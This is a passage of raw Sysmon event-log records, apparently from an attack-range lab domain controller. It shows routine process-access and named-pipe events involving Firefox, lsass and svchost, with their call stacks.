Firefox\xul.dll+e50238|C:\Program Files\Mozilla Firefox\xul.dll+19e1f56|C:\Program Files\Mozilla Firefox\xul.dll+19d6412|C:\Program Files\Mozilla Firefox\xul.dll+19ae344|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000105424Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.236{58E9C193-ACA7-615A-1400-00000000FC01}9401608C:\Windows\system32\svchost.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000105423Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-ConnectPipe2021-10-04 07:58:32.236{58E9C193-B422-615A-0602-00000000FC01}5552\cubeb-pipe-5552-3C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000105422Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 07:58:32.236{58E9C193-B422-615A-0602-00000000FC01}5552\cubeb-pipe-5552-3C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105421Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.234{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105420Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.234{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105419Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.198{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105418Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.198{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000105417Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-ConnectPipe2021-10-04 07:58:32.198{58E9C193-B425-615A-0702-00000000FC01}5268\chrome.5552.8.145938919C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105416Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.198{58E9C193-B422-615A-0602-00000000FC01}55525064C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+1b80fc|C:\Program Files\Mozilla Firefox\xul.dll+a15446|C:\Program Files\Mozilla Firefox\xul.dll+a0ffef|C:\Program Files\Mozilla Firefox\xul.dll+19ce81f|C:\Program Files\Mozilla Firefox\xul.dll+19cd1ec|C:\Program Files\Mozilla Firefox\xul.dll+13c95|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+13378|C:\Program Files\Mozilla Firefox\xul.dll+9f2211|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x8000000000000000105415Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 07:58:32.198{58E9C193-B422-615A-0602-00000000FC01}5552\chrome.5552.8.145938919C:\Program Files\Mozilla Firefox\firefox.exe 18141800x8000000000000000105414Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-ConnectPipe2021-10-04 07:58:32.198{58E9C193-B422-615A-0602-00000000FC01}5552\chrome.5552.7.27526959C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105413Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.183{58E9C193-B422-615A-0602-00000000FC01}55524224C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+13527b|C:\Program Files\Mozilla Firefox\xul.dll+12239ed|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000105412Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-ConnectPipe2021-10-04 07:58:32.183{58E9C193-B422-615A-0602-00000000FC01}5552\gecko-crash-server-pipe.5552C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105411Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.136{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2f710|C:\Program Files\Mozilla Firefox\xul.dll+e5ba99|C:\Program Files\Mozilla Firefox\xul.dll+e57449|C:\Program Files\Mozilla Firefox\xul.dll+e49022|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105410Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.136{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105409Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.136{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105408Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.136{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105407Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.136{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105406Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.136{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105405Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.136{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105404Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.136{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105403Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.136{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105402Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.136{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105401Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.136{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105400Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.136{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla 